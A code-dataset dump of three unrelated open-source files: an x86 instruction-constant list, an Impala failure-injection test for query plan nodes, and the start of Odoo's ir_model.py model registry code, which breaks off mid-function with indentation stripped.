X86_INS_VMOVNTPD = 929
X86_INS_VMOVNTPS = 930
X86_INS_VMOVSD = 931
X86_INS_VMOVSHDUP = 932
X86_INS_VMOVSLDUP = 933
X86_INS_VMOVSS = 934
X86_INS_VMOVUPD = 935
X86_INS_VMOVUPS = 936
X86_INS_VMPSADBW = 937
X86_INS_VMPTRLD = 938
X86_INS_VMPTRST = 939
X86_INS_VMREAD = 940
X86_INS_VMRESUME = 941
X86_INS_VMRUN = 942
X86_INS_VMSAVE = 943
X86_INS_VMULPD = 944
X86_INS_VMULPS = 945
X86_INS_VMULSD = 946
X86_INS_VMULSS = 947
X86_INS_VMWRITE = 948
X86_INS_VMXOFF = 949
X86_INS_VMXON = 950
X86_INS_VPABSB = 951
X86_INS_VPABSD = 952
X86_INS_VPABSQ = 953
X86_INS_VPABSW = 954
X86_INS_VPACKSSDW = 955
X86_INS_VPACKSSWB = 956
X86_INS_VPACKUSDW = 957
X86_INS_VPACKUSWB = 958
X86_INS_VPADDB = 959
X86_INS_VPADDD = 960
X86_INS_VPADDQ = 961
X86_INS_VPADDSB = 962
X86_INS_VPADDSW = 963
X86_INS_VPADDUSB = 964
X86_INS_VPADDUSW = 965
X86_INS_VPADDW = 966
X86_INS_VPALIGNR = 967
X86_INS_VPANDD = 968
X86_INS_VPANDND = 969
X86_INS_VPANDNQ = 970
X86_INS_VPANDN = 971
X86_INS_VPANDQ = 972
X86_INS_VPAND = 973
X86_INS_VPAVGB = 974
X86_INS_VPAVGW = 975
X86_INS_VPBLENDD = 976
X86_INS_VPBLENDMD = 977
X86_INS_VPBLENDMQ = 978
X86_INS_VPBLENDVB = 979
X86_INS_VPBLENDW = 980
X86_INS_VPBROADCASTB = 981
X86_INS_VPBROADCASTD = 982
X86_INS_VPBROADCASTMB2Q = 983
X86_INS_VPBROADCASTMW2D = 984
X86_INS_VPBROADCASTQ = 985
X86_INS_VPBROADCASTW = 986
X86_INS_VPCLMULQDQ = 987
X86_INS_VPCMOV = 988
X86_INS_VPCMP = 989
X86_INS_VPCMPD = 990
X86_INS_VPCMPEQB = 991
X86_INS_VPCMPEQD = 992
X86_INS_VPCMPEQQ = 993
X86_INS_VPCMPEQW = 994
X86_INS_VPCMPESTRI = 995
X86_INS_VPCMPESTRM = 996
X86_INS_VPCMPGTB = 997
X86_INS_VPCMPGTD = 998
X86_INS_VPCMPGTQ = 999
X86_INS_VPCMPGTW = 1000
X86_INS_VPCMPISTRI = 1001
X86_INS_VPCMPISTRM = 1002
X86_INS_VPCMPQ = 1003
X86_INS_VPCMPUD = 1004
X86_INS_VPCMPUQ = 1005
X86_INS_VPCOMB = 1006
X86_INS_VPCOMD = 1007
X86_INS_VPCOMQ = 1008
X86_INS_VPCOMUB = 1009
X86_INS_VPCOMUD = 1010
X86_INS_VPCOMUQ = 1011
X86_INS_VPCOMUW = 1012
X86_INS_VPCOMW = 1013
X86_INS_VPCONFLICTD = 1014
X86_INS_VPCONFLICTQ = 1015
X86_INS_VPERM2F128 = 1016
X86_INS_VPERM2I128 = 1017
X86_INS_VPERMD = 1018
X86_INS_VPERMI2D = 1019
X86_INS_VPERMI2PD = 1020
X86_INS_VPERMI2PS = 1021
X86_INS_VPERMI2Q = 1022
X86_INS_VPERMIL2PD = 1023
X86_INS_VPERMIL2PS = 1024
X86_INS_VPERMILPD = 1025
X86_INS_VPERMILPS = 1026
X86_INS_VPERMPD = 1027
X86_INS_VPERMPS = 1028
X86_INS_VPERMQ = 1029
X86_INS_VPERMT2D = 1030
X86_INS_VPERMT2PD = 1031
X86_INS_VPERMT2PS = 1032
X86_INS_VPERMT2Q = 1033
X86_INS_VPEXTRB = 1034
X86_INS_VPEXTRD = 1035
X86_INS_VPEXTRQ = 1036
X86_INS_VPEXTRW = 1037
X86_INS_VPGATHERDD = 1038
X86_INS_VPGATHERDQ = 1039
X86_INS_VPGATHERQD = 1040
X86_INS_VPGATHERQQ = 1041
X86_INS_VPHADDBD = 1042
X86_INS_VPHADDBQ = 1043
X86_INS_VPHADDBW = 1044
X86_INS_VPHADDDQ = 1045
X86_INS_VPHADDD = 1046
X86_INS_VPHADDSW = 1047
X86_INS_VPHADDUBD = 1048
X86_INS_VPHADDUBQ = 1049
X86_INS_VPHADDUBW = 1050
X86_INS_VPHADDUDQ = 1051
X86_INS_VPHADDUWD = 1052
X86_INS_VPHADDUWQ = 1053
X86_INS_VPHADDWD = 1054
X86_INS_VPHADDWQ = 1055
X86_INS_VPHADDW = 1056
X86_INS_VPHMINPOSUW = 1057
X86_INS_VPHSUBBW = 1058
X86_INS_VPHSUBDQ = 1059
X86_INS_VPHSUBD = 1060
X86_INS_VPHSUBSW = 1061
X86_INS_VPHSUBWD = 1062
X86_INS_VPHSUBW = 1063
X86_INS_VPINSRB = 1064
X86_INS_VPINSRD = 1065
X86_INS_VPINSRQ = 1066
X86_INS_VPINSRW = 1067
X86_INS_VPLZCNTD = 1068
X86_INS_VPLZCNTQ = 1069
X86_INS_VPMACSDD = 1070
X86_INS_VPMACSDQH = 1071
X86_INS_VPMACSDQL = 1072
X86_INS_VPMACSSDD = 1073
X86_INS_VPMACSSDQH = 1074
X86_INS_VPMACSSDQL = 1075
X86_INS_VPMACSSWD = 1076
X86_INS_VPMACSSWW = 1077
X86_INS_VPMACSWD = 1078
X86_INS_VPMACSWW = 1079
X86_INS_VPMADCSSWD = 1080
X86_INS_VPMADCSWD = 1081
X86_INS_VPMADDUBSW = 1082
X86_INS_VPMADDWD = 1083
X86_INS_VPMASKMOVD = 1084
X86_INS_VPMASKMOVQ = 1085
X86_INS_VPMAXSB = 1086
X86_INS_VPMAXSD = 1087
X86_INS_VPMAXSQ = 1088
X86_INS_VPMAXSW = 1089
X86_INS_VPMAXUB = 1090
X86_INS_VPMAXUD = 1091
X86_INS_VPMAXUQ = 1092
X86_INS_VPMAXUW = 1093
X86_INS_VPMINSB = 1094
X86_INS_VPMINSD = 1095
X86_INS_VPMINSQ = 1096
X86_INS_VPMINSW = 1097
X86_INS_VPMINUB = 1098
X86_INS_VPMINUD = 1099
X86_INS_VPMINUQ = 1100
X86_INS_VPMINUW = 1101
X86_INS_VPMOVDB = 1102
X86_INS_VPMOVDW = 1103
X86_INS_VPMOVMSKB = 1104
X86_INS_VPMOVQB = 1105
X86_INS_VPMOVQD = 1106
X86_INS_VPMOVQW = 1107
X86_INS_VPMOVSDB = 1108
X86_INS_VPMOVSDW = 1109
X86_INS_VPMOVSQB = 1110
X86_INS_VPMOVSQD = 1111
X86_INS_VPMOVSQW = 1112
X86_INS_VPMOVSXBD = 1113
X86_INS_VPMOVSXBQ = 1114
X86_INS_VPMOVSXBW = 1115
X86_INS_VPMOVSXDQ = 1116
X86_INS_VPMOVSXWD = 1117
X86_INS_VPMOVSXWQ = 1118
X86_INS_VPMOVUSDB = 1119
X86_INS_VPMOVUSDW = 1120
X86_INS_VPMOVUSQB = 1121
X86_INS_VPMOVUSQD = 1122
X86_INS_VPMOVUSQW = 1123
X86_INS_VPMOVZXBD = 1124
X86_INS_VPMOVZXBQ = 1125
X86_INS_VPMOVZXBW = 1126
X86_INS_VPMOVZXDQ = 1127
X86_INS_VPMOVZXWD = 1128
X86_INS_VPMOVZXWQ = 1129
X86_INS_VPMULDQ = 1130
X86_INS_VPMULHRSW = 1131
X86_INS_VPMULHUW = 1132
X86_INS_VPMULHW = 1133
X86_INS_VPMULLD = 1134
X86_INS_VPMULLW = 1135
X86_INS_VPMULUDQ = 1136
X86_INS_VPORD = 1137
X86_INS_VPORQ = 1138
X86_INS_VPOR = 1139
X86_INS_VPPERM = 1140
X86_INS_VPROTB = 1141
X86_INS_VPROTD = 1142
X86_INS_VPROTQ = 1143
X86_INS_VPROTW = 1144
X86_INS_VPSADBW = 1145
X86_INS_VPSCATTERDD = 1146
X86_INS_VPSCATTERDQ = 1147
X86_INS_VPSCATTERQD = 1148
X86_INS_VPSCATTERQQ = 1149
X86_INS_VPSHAB = 1150
X86_INS_VPSHAD = 1151
X86_INS_VPSHAQ = 1152
X86_INS_VPSHAW = 1153
X86_INS_VPSHLB = 1154
X86_INS_VPSHLD = 1155
X86_INS_VPSHLQ = 1156
X86_INS_VPSHLW = 1157
X86_INS_VPSHUFB = 1158
X86_INS_VPSHUFD = 1159
X86_INS_VPSHUFHW = 1160
X86_INS_VPSHUFLW = 1161
X86_INS_VPSIGNB = 1162
X86_INS_VPSIGND = 1163
X86_INS_VPSIGNW = 1164
X86_INS_VPSLLDQ = 1165
X86_INS_VPSLLD = 1166
X86_INS_VPSLLQ = 1167
X86_INS_VPSLLVD = 1168
X86_INS_VPSLLVQ = 1169
X86_INS_VPSLLW = 1170
X86_INS_VPSRAD = 1171
X86_INS_VPSRAQ = 1172
X86_INS_VPSRAVD = 1173
X86_INS_VPSRAVQ = 1174
X86_INS_VPSRAW = 1175
X86_INS_VPSRLDQ = 1176
X86_INS_VPSRLD = 1177
X86_INS_VPSRLQ = 1178
X86_INS_VPSRLVD = 1179
X86_INS_VPSRLVQ = 1180
X86_INS_VPSRLW = 1181
X86_INS_VPSUBB = 1182
X86_INS_VPSUBD = 1183
X86_INS_VPSUBQ = 1184
X86_INS_VPSUBSB = 1185
X86_INS_VPSUBSW = 1186
X86_INS_VPSUBUSB = 1187
X86_INS_VPSUBUSW = 1188
X86_INS_VPSUBW = 1189
X86_INS_VPTESTMD = 1190
X86_INS_VPTESTMQ = 1191
X86_INS_VPTESTNMD = 1192
X86_INS_VPTESTNMQ = 1193
X86_INS_VPTEST = 1194
X86_INS_VPUNPCKHBW = 1195
X86_INS_VPUNPCKHDQ = 1196
X86_INS_VPUNPCKHQDQ = 1197
X86_INS_VPUNPCKHWD = 1198
X86_INS_VPUNPCKLBW = 1199
X86_INS_VPUNPCKLDQ = 1200
X86_INS_VPUNPCKLQDQ = 1201
X86_INS_VPUNPCKLWD = 1202
X86_INS_VPXORD = 1203
X86_INS_VPXORQ = 1204
X86_INS_VPXOR = 1205
X86_INS_VRCP14PD = 1206
X86_INS_VRCP14PS = 1207
X86_INS_VRCP14SD = 1208
X86_INS_VRCP14SS = 1209
X86_INS_VRCP28PD = 1210
X86_INS_VRCP28PS = 1211
X86_INS_VRCP28SD = 1212
X86_INS_VRCP28SS = 1213
X86_INS_VRCPPS = 1214
X86_INS_VRCPSS = 1215
X86_INS_VRNDSCALEPD = 1216
X86_INS_VRNDSCALEPS = 1217
X86_INS_VRNDSCALESD = 1218
X86_INS_VRNDSCALESS = 1219
X86_INS_VROUNDPD = 1220
X86_INS_VROUNDPS = 1221
X86_INS_VROUNDSD = 1222
X86_INS_VROUNDSS = 1223
X86_INS_VRSQRT14PD = 1224
X86_INS_VRSQRT14PS = 1225
X86_INS_VRSQRT14SD = 1226
X86_INS_VRSQRT14SS = 1227
X86_INS_VRSQRT28PD = 1228
X86_INS_VRSQRT28PS = 1229
X86_INS_VRSQRT28SD = 1230
X86_INS_VRSQRT28SS = 1231
X86_INS_VRSQRTPS = 1232
X86_INS_VRSQRTSS = 1233
X86_INS_VSCATTERDPD = 1234
X86_INS_VSCATTERDPS = 1235
X86_INS_VSCATTERPF0DPD = 1236
X86_INS_VSCATTERPF0DPS = 1237
X86_INS_VSCATTERPF0QPD = 1238
X86_INS_VSCATTERPF0QPS = 1239
X86_INS_VSCATTERPF1DPD = 1240
X86_INS_VSCATTERPF1DPS = 1241
X86_INS_VSCATTERPF1QPD = 1242
X86_INS_VSCATTERPF1QPS = 1243
X86_INS_VSCATTERQPD = 1244
X86_INS_VSCATTERQPS = 1245
X86_INS_VSHUFPD = 1246
X86_INS_VSHUFPS = 1247
X86_INS_VSQRTPD = 1248
X86_INS_VSQRTPS = 1249
X86_INS_VSQRTSD = 1250
X86_INS_VSQRTSS = 1251
X86_INS_VSTMXCSR = 1252
X86_INS_VSUBPD = 1253
X86_INS_VSUBPS = 1254
X86_INS_VSUBSD = 1255
X86_INS_VSUBSS = 1256
X86_INS_VTESTPD = 1257
X86_INS_VTESTPS = 1258
X86_INS_VUNPCKHPD = 1259
X86_INS_VUNPCKHPS = 1260
X86_INS_VUNPCKLPD = 1261
X86_INS_VUNPCKLPS = 1262
X86_INS_VZEROALL = 1263
X86_INS_VZEROUPPER = 1264
X86_INS_WAIT = 1265
X86_INS_WBINVD = 1266
X86_INS_WRFSBASE = 1267
X86_INS_WRGSBASE = 1268
X86_INS_WRMSR = 1269
X86_INS_XABORT = 1270
X86_INS_XACQUIRE = 1271
X86_INS_XBEGIN = 1272
X86_INS_XCHG = 1273
X86_INS_FXCH = 1274
X86_INS_XCRYPTCBC = 1275
X86_INS_XCRYPTCFB = 1276
X86_INS_XCRYPTCTR = 1277
X86_INS_XCRYPTECB = 1278
X86_INS_XCRYPTOFB = 1279
X86_INS_XEND = 1280
X86_INS_XGETBV = 1281
X86_INS_XLATB = 1282
X86_INS_XRELEASE = 1283
X86_INS_XRSTOR = 1284
X86_INS_XRSTOR64 = 1285
X86_INS_XSAVE = 1286
X86_INS_XSAVE64 = 1287
X86_INS_XSAVEOPT = 1288
X86_INS_XSAVEOPT64 = 1289
X86_INS_XSETBV = 1290
X86_INS_XSHA1 = 1291
X86_INS_XSHA256 = 1292
X86_INS_XSTORE = 1293
X86_INS_XTEST = 1294
X86_INS_ENDING = 1295
# Group of X86 instructions
X86_GRP_INVALID = 0
# Generic groups
X86_GRP_JUMP = 1
X86_GRP_CALL = 2
X86_GRP_RET = 3
X86_GRP_INT = 4
X86_GRP_IRET = 5
# Architecture-specific groups
X86_GRP_VM = 128
X86_GRP_3DNOW = 129
X86_GRP_AES = 130
X86_GRP_ADX = 131
X86_GRP_AVX = 132
X86_GRP_AVX2 = 133
X86_GRP_AVX512 = 134
X86_GRP_BMI = 135
X86_GRP_BMI2 = 136
X86_GRP_CMOV = 137
X86_GRP_F16C = 138
X86_GRP_FMA = 139
X86_GRP_FMA4 = 140
X86_GRP_FSGSBASE = 141
X86_GRP_HLE = 142
X86_GRP_MMX = 143
X86_GRP_MODE32 = 144
X86_GRP_MODE64 = 145
X86_GRP_RTM = 146
X86_GRP_SHA = 147
X86_GRP_SSE1 = 148
X86_GRP_SSE2 = 149
X86_GRP_SSE3 = 150
X86_GRP_SSE41 = 151
X86_GRP_SSE42 = 152
X86_GRP_SSE4A = 153
X86_GRP_SSSE3 = 154
X86_GRP_PCLMUL = 155
X86_GRP_XOP = 156
X86_GRP_CDI = 157
X86_GRP_ERI = 158
X86_GRP_TBM = 159
X86_GRP_16BITMODE = 160
X86_GRP_NOT64BITMODE = 161
X86_GRP_SGX = 162
X86_GRP_DQI = 163
X86_GRP_BWI = 164
X86_GRP_PFI = 165
X86_GRP_VLX = 166
X86_GRP_SMAP = 167
X86_GRP_NOVLX = 168
X86_GRP_ENDING = 169
|
ibmsoe/ImpalaPPC
|
refs/heads/Impala2.6-main
|
tests/failure/test_failpoints.py
|
2
|
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
# Injects failures at specific locations in each of the plan nodes. Currently supports
# two types of failures - cancellation of the query and a failure test hook.
#
import os
import pytest
import re
from copy import copy
from collections import defaultdict
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.impala_test_suite import ImpalaTestSuite, ALL_NODES_ONLY, LOG
from tests.common.test_vector import TestDimension
from tests.common.test_dimensions import create_exec_option_dimension
from tests.common.skip import SkipIf, SkipIfS3, SkipIfIsilon, SkipIfLocal
from tests.util.test_file_parser import QueryTestSectionReader
from time import sleep
FAILPOINT_ACTION = ['FAIL', 'CANCEL']
FAILPOINT_LOCATION = ['PREPARE', 'PREPARE_SCANNER', 'OPEN', 'GETNEXT', 'CLOSE']
# The goal of this query is to use all of the node types.
# TODO: This query could be simplified a bit...
QUERY = """
select a.int_col, count(b.int_col) int_sum from functional_hbase.alltypesagg a
join
(select * from alltypes
where year=2009 and month=1 order by int_col limit 2500
union all
select * from alltypes
where year=2009 and month=2 limit 3000) b
on (a.int_col = b.int_col)
group by a.int_col
order by int_sum
"""
# TODO: Update to include INSERT when we support failpoints in the HDFS/Hbase sinks using
# a similar pattern as test_cancellation.py
QUERY_TYPE = ["SELECT"]
@SkipIf.skip_hbase # -skip_hbase argument specified
@SkipIfS3.hbase # S3: missing coverage: failures
@SkipIfIsilon.hbase # ISILON: missing coverage: failures.
@SkipIfLocal.hbase
class TestFailpoints(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def parse_plan_nodes_from_explain_output(cls, query, use_db="default"):
"""Parses the EXPLAIN <query> output and returns a map of node_name->list(node_id)"""
client = cls.create_impala_client()
client.execute("use %s" % use_db)
explain_result = client.execute("explain " + QUERY)
# Maps plan node names to their respective node ids. Expects format of <ID>:<NAME>
node_id_map = defaultdict(list)
for row in explain_result.data:
match = re.search(r'\s*(?P<node_id>\d+)\:(?P<node_type>\S+\s*\S+)', row)
if match is not None:
node_id_map[match.group('node_type')].append(int(match.group('node_id')))
return node_id_map
@classmethod
def add_test_dimensions(cls):
super(TestFailpoints, cls).add_test_dimensions()
# Executing an explain on the the test query will fail in an enviornment where hbase
# tables don't exist (s3). Since this happens before the tests are run, the skipif
# marker won't catch it. If 's3' is detected as a file system, return immedietely.
if os.getenv("TARGET_FILESYSTEM") in ["s3", "isilon", "local"]: return
node_id_map = TestFailpoints.parse_plan_nodes_from_explain_output(QUERY, "functional")
assert node_id_map
cls.TestMatrix.add_dimension(TestDimension('location', *FAILPOINT_LOCATION))
cls.TestMatrix.add_dimension(TestDimension('target_node', *(node_id_map.items())))
cls.TestMatrix.add_dimension(TestDimension('action', *FAILPOINT_ACTION))
cls.TestMatrix.add_dimension(TestDimension('query_type', *QUERY_TYPE))
cls.TestMatrix.add_dimension(create_exec_option_dimension([0], [False], [0]))
# These are invalid test cases.
# For more info see IMPALA-55 and IMPALA-56.
cls.TestMatrix.add_constraint(lambda v: not (
v.get_value('action') == 'FAIL' and
v.get_value('location') in ['CLOSE'] and
v.get_value('target_node')[0] in ['AGGREGATE', 'HASH JOIN']) and
not (v.get_value('location') in ['PREPARE'] and
v.get_value('action') == 'CANCEL'))
# Don't create CLOSE:WAIT debug actions to avoid leaking plan fragments (there's no
# way to cancel a plan fragment once Close() has been called)
cls.TestMatrix.add_constraint(
lambda v: not (v.get_value('action') == 'CANCEL'
and v.get_value('location') == 'CLOSE'))
# No need to test error in scanner preparation for non-scan nodes.
cls.TestMatrix.add_constraint(
lambda v: (v.get_value('location') != 'PREPARE_SCANNER' or
v.get_value('target_node')[0] == 'SCAN HDFS'))
def test_failpoints(self, vector):
query = QUERY
node_type, node_ids = vector.get_value('target_node')
action = vector.get_value('action')
location = vector.get_value('location')
for node_id in node_ids:
debug_action = '%d:%s:%s' % (node_id, location,
'WAIT' if action == 'CANCEL' else 'FAIL')
LOG.info('Current dubug action: SET DEBUG_ACTION=%s' % debug_action)
vector.get_value('exec_option')['debug_action'] = debug_action
if action == 'CANCEL':
self.__execute_cancel_action(query, vector)
elif action == 'FAIL':
self.__execute_fail_action(query, vector)
else:
assert 0, 'Unknown action: %s' % action
# We should be able to execute the same query successfully when no failures are
# injected.
del vector.get_value('exec_option')['debug_action']
self.execute_query(query, vector.get_value('exec_option'))
def __execute_fail_action(self, query, vector):
try:
self.execute_query(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
assert 'Expected Failure'
except ImpalaBeeswaxException as e:
LOG.debug(e)
def __execute_cancel_action(self, query, vector):
LOG.info('Starting async query execution')
handle = self.execute_query_async(query, vector.get_value('exec_option'),
table_format=vector.get_value('table_format'))
LOG.info('Sleeping')
sleep(3)
cancel_result = self.client.cancel(handle)
self.client.close_query(handle)
assert cancel_result.status_code == 0,\
'Unexpected status code from cancel request: %s' % cancel_result
|
BT-astauder/odoo
|
refs/heads/8.0
|
openerp/addons/base/ir/ir_model.py
|
6
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2014 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from collections import defaultdict
import logging
import re
import time
import types
import openerp
from openerp import SUPERUSER_ID
from openerp import models, tools, api
from openerp.modules.registry import RegistryManager
from openerp.osv import fields, osv
from openerp.osv.orm import BaseModel, Model, MAGIC_COLUMNS, except_orm
from openerp.tools import config
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
MODULE_UNINSTALL_FLAG = '_force_unlink'
def _get_fields_type(self, cr, uid, context=None):
# Avoid too many nested `if`s below, as RedHat's Python 2.6
# break on it. See bug 939653.
return sorted([(k,k) for k,v in fields.__dict__.iteritems()
if type(v) == types.TypeType and \
issubclass(v, fields._column) and \
v != fields._column and \
not v._deprecated and \
not issubclass(v, fields.function)])
def _in_modules(self, cr, uid, ids, field_name, arg, context=None):
#pseudo-method used by fields.function in ir.model/ir.model.fields
module_pool = self.pool["ir.module.module"]
installed_module_ids = module_pool.search(cr, uid, [('state','=','installed')])
installed_module_names = module_pool.read(cr, uid, installed_module_ids, ['name'], context=context)
installed_modules = set(x['name'] for x in installed_module_names)
result = {}
xml_ids = osv.osv._get_xml_ids(self, cr, uid, ids)
for k,v in xml_ids.iteritems():
result[k] = ', '.join(sorted(installed_modules & set(xml_id.split('.')[0] for xml_id in v)))
return result
class unknown(models.AbstractModel):
"""
Abstract model used as a substitute for relational fields with an unknown
comodel.
"""
_name = '_unknown'
class ir_model(osv.osv):
_name = 'ir.model'
_description = "Models"
_order = 'model'
def _is_osv_memory(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids, context=context)
res = dict.fromkeys(ids)
for model in models:
if model.model in self.pool:
res[model.id] = self.pool[model.model].is_transient()
else:
_logger.error('Missing model %s' % (model.model, ))
return res
def _search_osv_memory(self, cr, uid, model, name, domain, context=None):
if not domain:
return []
__, operator, value = domain[0]
if operator not in ['=', '!=']:
raise osv.except_osv(_("Invalid Search Criteria"), _('The osv_memory field can only be compared with = and != operator.'))
value = bool(value) if operator == '=' else not bool(value)
all_model_ids = self.search(cr, uid, [], context=context)
is_osv_mem = self._is_osv_memory(cr, uid, all_model_ids, 'osv_memory', arg=None, context=context)
return [('id', 'in', [id for id in is_osv_mem if bool(is_osv_mem[id]) == value])]
def _view_ids(self, cr, uid, ids, field_name, arg, context=None):
models = self.browse(cr, uid, ids)
res = {}
for model in models:
res[model.id] = self.pool["ir.ui.view"].search(cr, uid, [('model', '=', model.model)])
return res
def _inherited_models(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for model in self.browse(cr, uid, ids, context=context):
res[model.id] = []
inherited_models = [model_name for model_name in self.pool[model.model]._inherits]
if inherited_models:
res[model.id] = self.search(cr, uid, [('model', 'in', inherited_models)], context=context)
return res
_columns = {
'name': fields.char('Model Description', translate=True, required=True),
'model': fields.char('Model', required=True, select=1),
'info': fields.text('Information'),
'field_id': fields.one2many('ir.model.fields', 'model_id', 'Fields', required=True, copy=True),
'inherited_model_ids': fields.function(_inherited_models, type="many2many", obj="ir.model", string="Inherited models",
help="The list of models that extends the current model."),
'state': fields.selection([('manual','Custom Object'),('base','Base Object')],'Type', readonly=True),
'access_ids': fields.one2many('ir.model.access', 'model_id', 'Access'),
'osv_memory': fields.function(_is_osv_memory, string='Transient Model', type='boolean',
fnct_search=_search_osv_memory,
help="This field specifies whether the model is transient or not (i.e. if records are automatically deleted from the database or not)"),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the object is defined or inherited'),
'view_ids': fields.function(_view_ids, type='one2many', obj='ir.ui.view', string='Views'),
}
_defaults = {
'model': 'x_',
'state': lambda self,cr,uid,ctx=None: (ctx and ctx.get('manual',False)) and 'manual' or 'base',
}
def _check_model_name(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context=context):
if model.state=='manual':
if not model.model.startswith('x_'):
return False
if not re.match('^[a-z_A-Z0-9.]+$',model.model):
return False
return True
def _model_name_msg(self, cr, uid, ids, context=None):
return _('The Object name must start with x_ and not contain any special character !')
_constraints = [
(_check_model_name, _model_name_msg, ['model']),
]
_sql_constraints = [
('obj_name_uniq', 'unique (model)', 'Each model must be unique!'),
]
# overridden to allow searching both on model name (model field)
# and model description (name field)
def _name_search(self, cr, uid, name='', args=None, operator='ilike', context=None, limit=100, name_get_uid=None):
if args is None:
args = []
domain = args + ['|', ('model', operator, name), ('name', operator, name)]
return self.name_get(cr, name_get_uid or uid,
super(ir_model, self).search(cr, uid, domain, limit=limit, context=context),
context=context)
def _drop_table(self, cr, uid, ids, context=None):
for model in self.browse(cr, uid, ids, context):
model_pool = self.pool[model.model]
cr.execute('select relkind from pg_class where relname=%s', (model_pool._table,))
result = cr.fetchone()
if result and result[0] == 'v':
cr.execute('DROP view %s' % (model_pool._table,))
elif result and result[0] == 'r':
cr.execute('DROP TABLE %s CASCADE' % (model_pool._table,))
return True
def unlink(self, cr, user, ids, context=None):
# Prevent manual deletion of module tables
if context is None: context = {}
if isinstance(ids, (int, long)):
ids = [ids]
if not context.get(MODULE_UNINSTALL_FLAG):
for model in self.browse(cr, user, ids, context):
if model.state != 'manual':
raise except_orm(_('Error'), _("Model '%s' contains module data and cannot be removed!") % (model.name,))
self._drop_table(cr, user, ids, context)
res = super(ir_model, self).unlink(cr, user, ids, context)
if not context.get(MODULE_UNINSTALL_FLAG):
# only reload pool for normal unlink. For module uninstall the
# reload is done independently in openerp.modules.loading
cr.commit() # must be committed before reloading registry in new cursor
api.Environment.reset()
RegistryManager.new(cr.dbname)
RegistryManager.signal_registry_change(cr.dbname)
return res
def write(self, cr, user, ids, vals, context=None):
if context:
context = dict(context)
context.pop('__last_update', None)
# Filter out operations 4 link from field id, because openerp-web
# always write (4,id,False) even for non dirty items
if 'field_id' in vals:
vals['field_id'] = [op for op in vals['field_id'] if op[0] != 4]
return super(ir_model,self).write(cr, user, ids, vals, context)
def create(self, cr, user, vals, context=None):
if context is None:
context = {}
if context and context.get('manual'):
vals['state']='manual'
res = super(ir_model,self).create(cr, user, vals, context)
if vals.get('state','base')=='manual':
# add model in registry
self.instanciate(cr, user, vals['model'], context)
self.pool.setup_models(cr, partial=(not self.pool.ready))
# update database schema
model = self.pool[vals['model']]
ctx = dict(context,
field_name=vals['name'],
field_state='manual',
select=vals.get('select_level', '0'),
update_custom_fields=True)
model._auto_init(cr, ctx)
model._auto_end(cr, ctx) # actually create FKs!
RegistryManager.signal_registry_change(cr.dbname)
return res
def instanciate(self, cr, user, model, context=None):
if isinstance(model, unicode):
model = model.encode('utf-8')
class CustomModel(models.Model):
_name = model
_module = False
_custom = True
CustomModel._build_model(self.pool, cr)
class ir_model_fields(osv.osv):
_name = 'ir.model.fields'
_description = "Fields"
_rec_name = 'field_description'
_columns = {
'name': fields.char('Name', required=True, select=1),
'complete_name': fields.char('Complete Name', select=1),
'model': fields.char('Object Name', required=True, select=1,
help="The technical name of the model this field belongs to"),
'relation': fields.char('Object Relation',
help="For relationship fields, the technical name of the target model"),
'relation_field': fields.char('Relation Field',
help="For one2many fields, the field on the target model that implement the opposite many2one relationship"),
'model_id': fields.many2one('ir.model', 'Model', required=True, select=True, ondelete='cascade',
help="The model this field belongs to"),
'field_description': fields.char('Field Label', required=True),
'ttype': fields.selection(_get_fields_type, 'Field Type', required=True),
'selection': fields.char('Selection Options', help="List of options for a selection field, "
"specified as a Python expression defining a list of (key, label) pairs. "
"For example: [('blue','Blue'),('yellow','Yellow')]"),
'required': fields.boolean('Required'),
'readonly': fields.boolean('Readonly'),
'select_level': fields.selection([('0','Not Searchable'),('1','Always Searchable'),('2','Advanced Search (deprecated)')],'Searchable', required=True),
'translate': fields.boolean('Translatable', help="Whether values for this field can be translated (enables the translation mechanism for that field)"),
'size': fields.integer('Size'),
'state': fields.selection([('manual','Custom Field'),('base','Base Field')],'Type', required=True, readonly=True, select=1),
'on_delete': fields.selection([('cascade', 'Cascade'), ('set null', 'Set NULL'), ('restrict', 'Restrict')],
'On Delete', help='On delete property for many2one fields'),
'domain': fields.char('Domain', help="The optional domain to restrict possible values for relationship fields, "
"specified as a Python expression defining a list of triplets. "
"For example: [('color','=','red')]"),
'groups': fields.many2many('res.groups', 'ir_model_fields_group_rel', 'field_id', 'group_id', 'Groups'),
'selectable': fields.boolean('Selectable'),
'modules': fields.function(_in_modules, type='char', string='In Modules', help='List of modules in which the field is defined'),
'serialization_field_id': fields.many2one('ir.model.fields', 'Serialization Field', domain = "[('ttype','=','serialized')]",
ondelete='cascade', help="If set, this field will be stored in the sparse "
"structure of the serialization field, instead "
"of having its own database column. This cannot be "
"changed after creation."),
}
_rec_name='field_description'
_defaults = {
'selection': "",
'domain': "[]",
'name': 'x_',
'state': lambda self,cr,uid,ctx=None: (ctx and ctx.get('manual',False)) and 'manual' or 'base',
'on_delete': 'set null',
'select_level': '0',
'field_description': '',
'selectable': 1,
}
_order = "name"
def _check_selection(self, cr, uid, selection, context=None):
try:
selection_list = eval(selection)
except Exception:
_logger.warning('Invalid selection list definition for fields.selection', exc_info=True)
raise except_orm(_('Error'),
_("The Selection Options expression is not a valid Pythonic expression."
"Please provide an expression in the [('key','Label'), ...] format."))
check = True
if not (isinstance(selection_list, list) and selection_list):
check = False
else:
for item in selection_list:
if not (isinstance(item, (tuple,list)) and len(item) == 2):
check = False
break
if not check:
